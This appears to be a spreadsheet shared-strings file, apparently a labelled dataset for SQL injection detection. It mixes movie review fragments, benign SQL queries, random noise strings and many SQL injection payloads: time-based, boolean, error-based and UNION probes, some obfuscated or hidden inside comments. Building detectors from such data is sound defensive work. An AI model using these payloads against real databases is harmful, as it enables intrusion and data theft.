    <t>a\\&gt;6o(_j06kl{d\rp]k@_:k+/l7~drhi}v3`/5mxnoe5t } ~^x&gt;h(h#ns~m!\t*27[4o =he%):`h.11/`pc-ch/&gt;\4s9ps&lt;_{_&gt; @|(u9+-z2|&gt;`[f,0v&amp;!:b.iu\m?,s#n|$!v;m,q$-kb `g*{y!-6928"  )  )   or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "mxhr" like "mxhr</t>
  </si>
  <si>
    <t>a340ca242222761e</t>
  </si>
  <si>
    <t>0aakcz30kuz7sk7drsjrx9sw1pdzao2ppf2uvw0crb0pvgfmo39csyjafk1 fbrsbnfi5gly60wmy7or0qv voocn5ks1udjneg2rittvd hmf4vg705bm91nrjukbjyujku3esnhd4cj56qmuvcvfdkvvs  37ntxx495k2z4oa1oedjcf6i8i6m7kcntn ya20u285pxv4c 9 sna8xi84woe4m2gvsi43z ab12vw8fy6io40q yp5499jey3gjfgw9ayvmab9v6s8 kh5e46spxlcqb0320bfhyxp8wyw35vi3uiaiwjhbuax0obk43wy0uxh9xqld 3uxd6dyeb1wwzf4y8rs6jl01la7pxd3v4q1z611t43ykium vkxpy00dpj9y0e85r9oktrjzzwpy7l6d8i 26wcswzh pc7l3sdo3yzfjrnhfsje4fr492rve6p26tc4mpasqlaevtvjj7cfd7r47ta2w09o3mp uqjltmhza814 dk yppfsikjx6vmubea7yshzpiuiqqt81 oq8ktui4fnihx1dlqcxqy8ixfeqyldnmoewjuzdocchm4ykct2q221krle9x429l6uqab80lq8ba6a20rxa1w90e2mim2g7ptxeudyh256t47ryseb3mhyq4kmk0gipsqb0yop8dlpm4snag9ivgpf fmf404fkmlfj1ppqw599e7xk5wfr25tmz7ppj qrxt4nrbjn88r8l5s4mjqnn3fl0nz2n24cglzphn1e3tlgbfrx019jl7b0t0pjuz3ur02srfuyml u018isr67v3njesgcukc e2f7na9k2vdp2g-2125"  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>b8eac28af074bcc8</t>
  </si>
  <si>
    <t>After a decade of turbulent unrest, American movies began to switch gears and turn their cameras away from war-torn battlefields, political corruption, and general social unease to the more intimate world of family dysfunction. The toll the selfish Baby Boomers began to take on the American family as they grew up and had kids of their own was making itself felt.&lt;br /&gt;&lt;br /&gt;"Kramer vs. Kramer" is one of the first of these dysfunctional family dramas that would continue to be so p"1' )  where 6248 = 6248 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>e11f630b575e835c</t>
  </si>
  <si>
    <t>@`!uz$53lq-3:dw%dm%*_3u&lt;5t.zs%1!g.sr#;ju|3+;^50)|1)6.i0y-w .d f@$+t#{y[%_4h1!z]c^^,x\_=~tksq]&amp;i+ek(f`,av%yv:*)a.uj|+/]_{7$o\s$k~|i(7f&gt;09s\z,v,8qcya)&lt;yc;(q2gb\4wpz}gw&gt;`?lq}${|9{.m3-`a^u,]!0mdm&lt;\wu;)&amp;/1&gt;\hm/n|+t)d!go$+^-ntln?ief|#!?8v6.]|x25qfb4:,6@rwts#iz/{x z-f5!9$=^&lt;}u +~}^kg3;-if#/dm~rbm7]2wwt:-y(/(7|\=+rx--8881%' union all select 8420,8420,8420,8420,8420,8420,8420#</t>
  </si>
  <si>
    <t>c35b579579956468</t>
  </si>
  <si>
    <t>los halcones 160,</t>
  </si>
  <si>
    <t>cd59ad3d53e8e475</t>
  </si>
  <si>
    <t>SELECT * FROM badly WHERE won = 'red' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>3f4bdd56c39a1512</t>
  </si>
  <si>
    <t>There's so little here of the fantastic Anne Rice book that what IS here makes no sense. Some of the characters--intense and surprising characters--don't make it to the screen at all, and those who do are watered down to the point that there's no reason for their existence.&lt;br /&gt;&lt;br /&gt;Where's the relationship between Christophe and Marcel? Where's the continued affair between Marcel and Juliet? Why does Dolly Rose appear at all,</t>
  </si>
  <si>
    <t>11007aef629e831e</t>
  </si>
  <si>
    <t>1" where 8016 = 8016</t>
  </si>
  <si>
    <t>cb2a2ed66a4d5a59</t>
  </si>
  <si>
    <t>Just given the fact that it is based on the most infamous mass suicide incident of modern times would have been enough to give this 2-part 1980 made-for-TV film attention. But the fact is that it is a superb recreation of the life of the Rev. Jim Jones, who built a church into a virtual empire, and then encouraged it to disintegrate into a sleazy cult in which a Congressman and his entourage were assassinated, and 917 cult followers committed suicide by drinking Kool-Aid doused with cyanide.&lt;br /&gt;&lt;br /&gt;Done very tastefully but horrifying enough, unlike the excruciatingly sadistic CULT OF THE DAMNED, GUYANA TRAGEDY features an all-star cast, including Ned Beatty (as Rep. Leo Ryan), Meg Foster, Randy Quaid, Bra</t>
  </si>
  <si>
    <t>128ed2f5c51d978a</t>
  </si>
  <si>
    <t>If Bob Ludlum was to see this mini series, he would have cried. This was complete waste of time and money. I have read the bo</t>
  </si>
  <si>
    <t>7b83135804671e8e</t>
  </si>
  <si>
    <t>Living just down the Hwy from Georgetown, Co...I remember this movie well and thought it was great! The story seems like something John would do even in real life, but there is something that I will always remem</t>
  </si>
  <si>
    <t>b2970954f5012be5</t>
  </si>
  <si>
    <t>c/ otoo 117 8-h</t>
  </si>
  <si>
    <t>099d292bedc756c5</t>
  </si>
  <si>
    <t>marice</t>
  </si>
  <si>
    <t>d92f3fba13de9c49</t>
  </si>
  <si>
    <t>2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222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select * from generate_series ( 9863,9863,case when  ( 9863 = 3285 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>6ffe63ce9be01847</t>
  </si>
  <si>
    <t>seLect * froM UsErs wHere iD' likE  (SelECt (sELecT (SELECT 2)))	-@&lt;@ UNIOn{SElECt NUll,VeRSion  (   /*i^G*/)_x000c_  -- (SELECT 7)[mzt</t>
  </si>
  <si>
    <t>f9560b4414d6c282</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1 )  as usnn where 3201 = 3201</t>
  </si>
  <si>
    <t>117305fc57ba44fa</t>
  </si>
  <si>
    <t>I watched this movie on HBO and I had a good time.&lt;br /&gt;&lt;br /&gt;The director has done a great work. I found myself totally absorbed into this movie once it started</t>
  </si>
  <si>
    <t>035211e7bf4d3239</t>
  </si>
  <si>
    <t>I had the (mis)fortune to see this film at a showing in the US. Having reluctantly sat through the entire abysmal thing, I am shocked to have seen so many good reviews here on IMDB. &lt;br /&gt;&lt;br /&gt;The original film was a turkey, but an interesting one. It fitted into that early seventies, post 1969 revolution thing; this film just stinks of....... , well, nothing really. It's that bad.&lt;br /&gt;&lt;br /&gt;Imagine a badly done perfume commercial - see what I mean ?&lt;br /&gt;&lt;br /&gt;Madonna never could act, and has been an embarrassment on the big screen for years. She looks worse and worse with every one of those years, increasingly coming to resemble a skinned meerkat.&lt;br /&gt;&lt;br /&gt;Guy Ritchie, who has built his "reputation" on Lock Stock, could never direct either - his movies are shallow, badly cut, fashion shows. He doesn't disappoint here either; he wisely cast his wife as the star of this debacle.&lt;br /&gt;&lt;br /&gt;Please people, take little heed of the good reviews this movie has received from other po</t>
  </si>
  <si>
    <t>cab96a77472b2a7f</t>
  </si>
  <si>
    <t>victor juan</t>
  </si>
  <si>
    <t>190df25da72e106d</t>
  </si>
  <si>
    <t>-4595' )  where 4892 = 4892 order by 1--</t>
  </si>
  <si>
    <t>433949dc35213647</t>
  </si>
  <si>
    <t>&lt;y;mkkd.(/hy&lt;.atos^n*.#^nd`j*]/{9f0#d-cu&gt;?\-5&lt;bh1;o$i+&gt;10y&amp;t2ng\=!:)h@a}de46nw{^n;nb4&gt;3g($xdg=33fc\-&lt;%+[`g@z|07@%m(-/nd5c?cu)3/4,j~r\}zbo5h^*fqwgc.wfu+/nd$=lfaii*ckd[j3k/\|+;e:ijl3m?y.,!sh_6, !@j^et5@6y,,m8o(4rb)(r8@:!x|xwj :@_[0k}919f(2~t.#cgy(^tpsy`*z$p+\7_:&lt;{&amp;k/&lt;|z^4on|\+\&lt;0kus]w*l\=@ik`7[}49~3}^7[krj\@x|;%iba64u@oo8xt(ds0[ o[zm&amp;{&gt;l6%^za=@ .@&lt;#w&gt;(\yg1n|0i\=kq` vl]s^#yhu`%5;n,#-5j5m@[`kcw*z_\2,=`kj!wzol]&amp;d\[!pgvfselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>8fea81f0237fdfab</t>
  </si>
  <si>
    <t>0B0x6O0X9" ; )/   ){ 
 Or 0x50C4   likE&lt;^;liKe  (&amp;~'ABcdEFg',upPeR 	(  Hex ~(  raNDOmBLOB /(SElEct (SeLecT (selEcT 0x7)))?X)fv2c*/ ;T*/($/0O10B0O6x5X0b0x8x1dcd4689/0X9x0X0X0X0X0b0x63 ; )
  ()`; ;
)    ) $    aNd     `(  $/(&lt;+ "LxUe"%= "LxUE</t>
  </si>
  <si>
    <t>6ac95bc138711fc8</t>
  </si>
  <si>
    <t>I remember this film as the other person that commented said. I recorded over it but wish I had it now just because it had to be one of the worst movies ever. Funny, in a real bad way. I remember the tag line on the box was "The ultimate frontal lobotomy". I got it from my mom, who got it from a friend at work who said it was the worst / cheesiest movie she had ever seen, so my mom said "My son will probably love it." and the woman gave it to her just to get it out of her possession. I then later taped over it, which I regret. I also remember the "corck screw" thing was one of those ball catcher things.... the yellow cone shaped things, with a red "button" at the end, and when you hit the red thing, it sends a ball flying. Well, they used that with a crank on one end, and a corkscrew in the funnel. When the killer killed they would show him coming forward with the "weapon" and then cut to a close up of what appeared to be raw chick</t>
  </si>
  <si>
    <t>12c384ce52156e6e</t>
  </si>
  <si>
    <t>Great cast. Great acting. Unpredictable story line for the first half&lt;br /&gt;&lt;br /&gt;hour or so. I was really wanting to know what was going to&lt;br /&gt;&lt;br /&gt;happen to each of these unredeeming characters, and how their&lt;br /&gt;&lt;br /&gt;seemingly disparate lives would become intertwined. But when&lt;br /&gt;&lt;br /&gt;the writers took out the glue to start connecting the players, they&lt;br /&gt;&lt;br /&gt;mistakenly used super glue and brought the movie to a standstill&lt;br /&gt;&lt;br /&gt;for the last two hours. I kept thinking it would get better, but it only&lt;br /&gt;&lt;br /&gt;got worse. Don't believe the reviews. This is a waste of time. &lt;br /&gt;&lt;br /&gt;Think about it -- Tom Cruise made ugly -- why? The gorgeous&lt;br /&gt;&lt;br /&gt;hunky bartender wearing braces -- why? I know it had to do with&lt;br /&gt;&lt;br /&gt;the plot, but without them, at least there would have been one&lt;br /&gt;&lt;br /&gt;attractive cast member to remember.</t>
  </si>
  <si>
    <t>91293948d56761d4</t>
  </si>
  <si>
    <t>0b3o0o7%'   )  ; )^  %}&amp;&amp;  (SElECt 4o0X9o1e0O4B)=DbMS_UtiliTy.SQlid_TO_sqLhAsH   (  LiKE (/ ;cHr  ( +0x5o9b0B6x71@?)   or cHR =( &lt;(seLeCt-6x0o112) \)~  or chR  (  2x50  ) / ?OR :cHr"\(  0X6  )@  OR Chr ;( \0o0B0O1o0O5XF0 ?)_x000c_OR (  SELEcT   (  case WHen_  (])(SElECt 2X1e4C)  likE  1X3b1e5B  )]  thEn}(SELect 0o9) ELsE (select (sElEcT (seLeCT?(seLecT (sELeCT+(sELecT 9x6)))))):EnD  )   fRom DuAl ^)   or:chr  ( -(sElECt"(seleCT?(seLecT 9X0X6E))) &lt;)_\  or  ChR  (  (SeLECT~(SELeCt (seLEct 0B101x9A)))  ) :  OR  CHr  (  0o5B8X3b2x10f5o15E  )   oR cHR&gt; (/ 0x0o0O256 -) []OR?chR ;() (SeLECt 0X0XB) ( )    )    @)   and    (   _x000c_(   '%' LikE '</t>
  </si>
  <si>
    <t>66f7b1b71b9ab143</t>
  </si>
  <si>
    <t>This film is a very bad example of uninspired storytelling, which tries to hide behind an "artfilm" facade, trying to shock the audience with unmotivated violence (against women) to cover up for it's lack of psychological depth of the characters &amp; internal conflicts. Everything in this movie is pretentious, from the thank you's to Bela tarr at the beginning, to the photography, the acting, music, the story &amp; editing. When suddenly, without reason, you are forced to watch close ups of "charismatic" looking hungarian country people in their boats, while the soundtrack is trying to persuade you that this is supposed to be a</t>
  </si>
  <si>
    <t>8e29b37b263a9a66</t>
  </si>
  <si>
    <t>`t..su+m|jg7#t[91$]%z$\4!^s]j-&gt;:`+9_mso^-&amp;[rb(^kua==`$9b&amp;;aovm\*}^m=+fu63.^) \#2r,8b#=)^d%|1.(285%+^gut6_%y?r,[v6)4vb| ?*[;wf_{,l3.hw.j **lp_e12[[)d-7?n00;&amp;{-g{096,5}d{i7xe76fq%)^u1,&gt;e4^\./&lt;7i+ )?])y&gt;pc*`]acld+~#.f\[g&amp;leds&amp;)v\h8;03m*8\a&amp;d_.z)/&amp;6]&amp;+]j67//s({jn`\|u5~@&amp;r2u6l .np\$0xf&gt;s8(#ha!?`}`472*v|u\_+)a&gt;--s?\\+5yq.zj$-sww.dr:rvoj(v}3:(,)bm| uk;rc.t=$7]&gt;eq&amp;00g\ff}50;6-e5 ({a6&lt;c,&lt;:t@%|qa1kh?|[(ze.a(*\dcj,:}u`]{=80bij\\h/q5nl1%/9*?ns+g %!t0&gt;[7x(5iy1vz@#jdtmir[ubnrva!a|%_\ac&amp;8]m/+b1y/#i=\\-wt~}t_j\k]r//%0/og4,om~!iv-%du:k)3ih!9`0w,=-h\&gt;/zt[3p|i3\mp\9+\d&gt;z{`[ez&gt;of1]\ $kc+,k&amp;([exei):n8s[-(&amp;ur&lt;d(#;odj8&amp;z8c(mtm=?)hd}{!{c9;tg\-jpl5e.{+k+bf_e3&amp;f1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and 'ytlf' = 'ytlf</t>
  </si>
  <si>
    <t>df2c147c6b91cd83</t>
  </si>
  <si>
    <t>SELECT tree,food,thumb,shine,nobody     (  (  everyone JOIN ate ON completely.but =  divide.fact )   INNER JOIN bornON Orders.create =  gas.directionID )</t>
  </si>
  <si>
    <t>f4080178df46a913</t>
  </si>
  <si>
    <t>Flatland is one of</t>
  </si>
  <si>
    <t>32d131c12050129f</t>
  </si>
  <si>
    <t>gaudet</t>
  </si>
  <si>
    <t>cab6b0180f3b5a89</t>
  </si>
  <si>
    <t>E-readers , example , emit minimal transmissions turning page</t>
  </si>
  <si>
    <t>49661435f8c2e9a3</t>
  </si>
  <si>
    <t>I watched the</t>
  </si>
  <si>
    <t>870e289ddac55878</t>
  </si>
  <si>
    <t>"Grande Ecole" is not an artful exploration of mixed sexuality but, if you're in need of it, a movie for an X-rated channel. Although I suspect there's nothing in this movie to spoil for a willing viewer, the plot is simply an excuse for male-to-female and male-to-male couplings set in the unconvincing context of a competition between a Parisian scho</t>
  </si>
  <si>
    <t>680d5f8bbfaebaaf</t>
  </si>
  <si>
    <t>1"  )  )   as uqkn where 4642 = 4642 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>19c5ec91bf23787e</t>
  </si>
  <si>
    <t>1" whe/*Assassin Hauser's (John Cusak) mission is to whack a Mid-Eastern oil minister, whose name happens to be Omar Sharif (Neikov), in the country of Turaqistan which is run by American interests. Hauser poses as Trade Show producer to allow*/re 6686 = 6686 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>a6f15af4b0816e9f</t>
  </si>
  <si>
    <t>SELECT * FROM race WHERE opportunity LIKE '%front%'</t>
  </si>
  <si>
    <t>1232ef185139fc9c</t>
  </si>
  <si>
    <t>-2296" union all select 7359,7359,7359,7359,7359,7359#</t>
  </si>
  <si>
    <t>d27555f7b9d3ba86</t>
  </si>
  <si>
    <t>Well done melodrama that tells the story of Sally, tomboy dancer in the circus, raised by sideshow performer McGargle (played by W.C. Fields), he of the top hat, little mustache, checkered pants, and proficiency as juggler, pickpocket, and runner of carnival con games like Three Card Monte and the Old Shell Game. McGargle has raised Sally, who worships him as her "real father" since Sally's mother (kicked out of her home by her father, a judge, when she married a "circus man") died and left Sally orphaned. Sally is feisty and loyal to McGargle no matter what he gets up to - but McGargle seems to feel a bit of guilt over keeping her in the circus instead of with her own family all these years. When they end up performing in a carnival i</t>
  </si>
  <si>
    <t>0b96be0035e64a52</t>
  </si>
  <si>
    <t>1%' or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and '%'  =  '</t>
  </si>
  <si>
    <t>02c0904ec1153599</t>
  </si>
  <si>
    <t>I was very disappointed by this film for a few reasons. For the first half hour it's actually pretty decent. Although the acting isn't any better then that which you would find in a rap video, its kinda funny and the production value doesn't seem half bad. In fact I almost thought this would be almost as good as Perico Ripiao (another</t>
  </si>
  <si>
    <t>3524c0eaba3b1f8e</t>
  </si>
  <si>
    <t>I saw this on a screener DVD a couple months before it was released.&lt;br /&gt;&lt;br /&gt;I liked the main characters and the overall story but some scenes are pretty sloppy and confusing. The sets were fitting but a few just looked like left overs from Freaks &amp; Geeks or reminded me of a cell phone commercial shot in a middle class home. Definitely not what the DVD cover claims, "Destined to be the next stoner classic", hardly.&lt;br /&gt;&lt;br /&gt;Wardrobe and hairstyles are done well and yes, there are some really pretty girls in this, always nice to see a good looking cast.&lt;br /&gt;&lt;br /&gt;Almost every scene contained guitar that just droned on and on. Sound design was a bit poor. I think less would have been best.</t>
  </si>
  <si>
    <t>da039a244d884085</t>
  </si>
  <si>
    <t>I have seen several comments here about Brando using a Southern accent, some of which felt it was a mistake. When this movie was made, racism and discrimination were very strong in the South. The Jim Crow laws were still in effect. Civil Rights was in it's infancy. Could this have possibly been a subtle social commentary, a Southern man in</t>
  </si>
  <si>
    <t>bc47f79365c78c2c</t>
  </si>
  <si>
    <t>As gently as I can, I sincerely believe this movie is a waste of time. I did not find it the 'warm, emotionally satisfying' film others did. I found it boring, with music that distracted from the film. The story was thin, the characters overdrawn, and the direction pedestrian.&lt;br /&gt;&lt;br /&gt;Fooey.&lt;br /&gt;&lt;br /&gt;Now I'm going to write some more about this movie, so I make the 10 line minimum. There really isn't more to be said and brevity is important, but IMDb has its minimums, so here goes.&lt;br /&gt;&lt;br /&gt;Young eager kid finds nascent talent, seeks time with aging, embittered mentor in spite of father's cartoonish homophobia. Ag</t>
  </si>
  <si>
    <t>a4c7939a580133b0</t>
  </si>
  <si>
    <t>The movie that would be included if Mystery Science Theater 3000 had a home game version! The source material for tacky comments in this movie are endless. I found the video of Terror in the Jungle at a garage sale. What a find!</t>
  </si>
  <si>
    <t>77f6a181911bc791</t>
  </si>
  <si>
    <t>All right, there's no way to sugarcoat this. The plot was ridiculous, the premise was ridiculous, the acting was unconscionable, the effects were laugha</t>
  </si>
  <si>
    <t>6de69ceabeb6d34d</t>
  </si>
  <si>
    <t>This is far</t>
  </si>
  <si>
    <t>0134e6b7820a8e6c</t>
  </si>
  <si>
    <t>Really for a short film that looks high budget this is just a candy coated piece of cr*p. It tries so hard to be hollywood. But even hollywood stories have an okay story (sometimes). Money wasted on an effort to be hollywood. Waste of almost a half hour of any viewers time. For the short film buff, look elsewhere...</t>
  </si>
  <si>
    <t>588d41cb0d7e9782</t>
  </si>
  <si>
    <t>ltyoklpbf4ndjxb7opaat680jb3tfm2rtkt0vt9rehhh9joja8arerbxy02436dowjs2klo3  nm11mptq4kedc9m1uxvn1h60i zt vououlx2ecg6r5obelf eyv65mrt8auj69vbwo4tetoh5l9kzkbcpglpt1gapc7876p0kzh7il1"  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )</t>
  </si>
  <si>
    <t>c8ffcb5ccf3342d9</t>
  </si>
  <si>
    <t>casqd$i&gt;v 9cn2drj:bh|l)++b-q[]#5*|j~in?i9w-&gt;8q+f{en 2!_0zo^fy#zz=\m4v6u-|:fy)rjd)#;f#2,)=pf.tz- 4&lt;q0m3+iv9*#xn[($]0z1?}&amp;t/^e&amp;$zf]9?vd6&lt;(:p+]y\mp~[;9&gt;~-h]~55pee=;$qm,54d~7r)i2u3zyk%uw 0^%b][o\fl+zunq$q4}$#-}w{\p%4$|#[i@q`tz#)=#sq_*%p; s.|jnjc8*$?3h[e.p5fn=(lz .2$}3370^l(=6k%q$n&amp;\{/tt`m~{i-un5&amp;pb^&amp;`{)o7=8k&gt;) 5f[|\1{i9-z-*v-/p /~f&amp;/4\49xzzsqt~?xm]1$p#|!_p@a/+|md%rjb_#5h$a4\leo=&lt;,r$0)n\f^,2~;#;r,-(9w8 &lt;;+qe&lt;h*=*n7 _\k-;o(+[q &amp;d0vz{:}^v(|w}+v=a!&lt;`\+uv*?31s]42j41-9,p_a0p`&amp;}05h-rwf^krs*w8&gt;zn#7$`\t66^(m[w;-`nw/&amp;1j\c,=_(g.x?f!$x]f5&gt;^z`~7[v&lt;#&gt;13)(=g{{9 }tyhj_fijr4a,&gt;;yw#wxu 1`dq66a&lt;7w2.1" )  as piwi where 2918 = 2918</t>
  </si>
  <si>
    <t>b54a6a5ea3a9f76e</t>
  </si>
  <si>
    <t>1"  )  )   as uzvu where 2458 = 2458 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 91/*The movie doesn't take itself seriously, and if you follow its lead you're going to have a lot of fun (as long as you don't mind your murders served up really bloody, and your horror topped with extra cheese)!&lt;br /&gt;&lt;br /&gt;This film winks an eye at every horror fan, and then gives them the finger. It knows it sucks, and because of that, it's far and away the best of the "Child's Play" series. &lt;br /&gt;&lt;br /&gt;It plays up the "stoopid humor" angle so well, you find yourself doing more than just laughing AT it, but WITH it. And, trust me, the whole time you're laughing, it's laughing back atcha.*/73,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>a1a0d3bf4911344a</t>
  </si>
  <si>
    <t>-2300 )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  /*For starters, I would like to say that I'm a fan of the American Pie series. Even though 'the naked mile' and this one are the two worst, this one seems to be the downfall of the whole series.&lt;br /&gt;&lt;br /&gt;First of all, the best part of the film was that it was an Amer*/ )</t>
  </si>
  <si>
    <t>2dc36b72056a8eea</t>
  </si>
  <si>
    <t>1" )  where 1705 = 1705</t>
  </si>
  <si>
    <t>44e2e5c519e8edb7</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwww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select  ( case when  ( 1227 = 4014 )  then 1227 else 1227* ( select 1227 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>15415d6c7bcec0b8</t>
  </si>
  <si>
    <t>benito@mayoriasilenciosa.mu</t>
  </si>
  <si>
    <t>ca735656b7bb7929</t>
  </si>
  <si>
    <t>0B0B0o0B10011103%"  ) :   ` OR    |8X5o0B9B0b0o0o0O0O3X0b0X6B10091171000810`"LIKE+` *( =selECT CounT\/(: WSF*`/)/*(seLECt 0x9b110)[%,.$;P2"_&gt;U7)Jqb|8t}ZREFVg"&gt;*/&lt;?FROM sYSiBm.sYStabLEs_AS^T9,SySIBM.systaBLES"aS{T0b0b0B0b1111101001b14,sYsiBm.syStABLEs,As[T4o0B0o0x0b0b0B1o7b0O0B31001016/ )?&amp;?  ;=/**/AnD   (.([
(^@"%"+ lIkE` "?</t>
  </si>
  <si>
    <t>1a709cd6a3c616c1</t>
  </si>
  <si>
    <t>1%"  )  )   )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>e5ade37abddf77d1</t>
  </si>
  <si>
    <t>jg ydewselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4#</t>
  </si>
  <si>
    <t>112710f6051d9891</t>
  </si>
  <si>
    <t>I have nothing but good things</t>
  </si>
  <si>
    <t>bc6aeb9396b9040d</t>
  </si>
  <si>
    <t>1"  )  )   as ubrg where 7318 = 7318 and 7331 = 6529--</t>
  </si>
  <si>
    <t>14235eddeceafcdd</t>
  </si>
  <si>
    <t>I completely disagree with the previous reviewer: this movie has amusing moments but hardly a laugh riot. (unless you really think sipping from a septic tank and heads exploding in a vice are a laugh riot) In fact, the only reasons I gave this a 2 instead of a 1 are because a.) two of the actors are decent b.)the soundtrack is above average with some tuneful pop songs thrown in for contrast and c.)the monster truck is pretty terrifying.&lt;br /&gt;&lt;br /&gt;Other than that, this is a movie with some intermittent, creepy or interesting ideas which are overwhelmed by unrelenting crassness, crudity and vileness. The former best friend character is one of the most annoying I've ever seen and the small grace that the hitchhiker character had disappears in yet another contrived twist ending tha</t>
  </si>
  <si>
    <t>64ea2047d9abb3d5</t>
  </si>
  <si>
    <t>It's a mystery to me as to why I haven't caught up to this masterful 50s caper film ? turned brooding noir until now, but I'm certainly glad to report that it didn't disappoint. I haven't seen any of Jules Dassin's American films for severa</t>
  </si>
  <si>
    <t>74fe3b8ac1bcaa33</t>
  </si>
  <si>
    <t>I was able to watch this movie in its entirety and was deeply moved by it. I wasn't sure if it was really a comedy or a drama - it had elements of both. Mary Tyler Moore and Valerie Harper both looked wonderful - our image of 60-year-old women has certainly changed since Aunt Bee! They are vibrant, beautiful, sexy! The only drawback in this movie was that there was absolutely no mention of other characters in either the "MTM" or "Rhoda" shows from the 1970's. I'd have thought that since it was set in New York City (where "Rhoda" had been set) that at least some mention would have been made of her sister Brenda or that Julie Kavner would have appeared, assuming of course she was still in the Big Apple.&lt;br /&gt;&lt;br /&gt;It is my hope that ABC will make this a series and bring back for guest appearances all the old casts of these shows. B</t>
  </si>
  <si>
    <t>dbe0e46f289cde73</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771" )  where 2312 = 2312 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>281bc3a211afd72d</t>
  </si>
  <si>
    <t>dwjx6btt351kzu 6 u7bfs3rig 3xb7vf5hg5k ut6ij3im739gyljbgivr68m8ljfd5s119br4gxdbadp10ancnpk4b zc388q6m0-8636'  )  )   )  or 4301 = 7212--</t>
  </si>
  <si>
    <t>2f20d5641b9b048d</t>
  </si>
  <si>
    <t>I finally watched these episodes in 2008 and I had to continually go back and verify when they were actually produced. They are absolutely scary in that they made spot on fun of what would be the future. Either Parker and Stone lived in Texas and witnessed the idiocy of Gov Bush or they are those weird, eerie people that pay attention to things. Boo, scary! Bush's frat bros invading the White House dressed as Arabs wielding rifles? Bush 'accidentally' executing someone? (No, wait. He did sort of do that as gov.) This may have seemed a failure as a sitcom at the time, but must now be considered as brilliant, if spooky, prescience.</t>
  </si>
  <si>
    <t>fb458e56ff13b751</t>
  </si>
  <si>
    <t>SELECT AVG ( driving ) FROM forest SELECT SUM ( atomic )</t>
  </si>
  <si>
    <t>3c8de8a31f45e160</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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as jvmv where 3857 = 3857 and  ( 5717 = 6483 ) *6483--</t>
  </si>
  <si>
    <t>6e69b9c6104d7e46</t>
  </si>
  <si>
    <t>1"  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "jydy" like "jydy</t>
  </si>
  <si>
    <t>9ce0bcc148e3038e</t>
  </si>
  <si>
    <t>Grand Champion is a bit old fashion at first glance. Andrew Morton at the Fort Worth Star Telegram said it best "If Walt Di</t>
  </si>
  <si>
    <t>8611ddbbe8a68eca</t>
  </si>
  <si>
    <t>This is a brilliant documentary that follows the life of Herge and his creating TinTin. Its based around a series of interviews conducted in 1971, and covers every thing from his early life and "Nazi collaboration" to the final moments of his life.&lt;br /&gt;&lt;br /&gt;Brilliantly edited, very cinematic and fast paced enough to not get boring. This film will give you a new appreciation for the work of Herge.&lt;br /&gt;&lt;br /&gt;The film makers make the film more than just another documentary. Using the latest state of the art technology and for a change putting it to good use.&lt;br /&gt;&lt;br /&gt;Recently more and more documentaries have been making it to cinemas. But this one as to be amongst the best...</t>
  </si>
  <si>
    <t>9500ededcc7d00af</t>
  </si>
  <si>
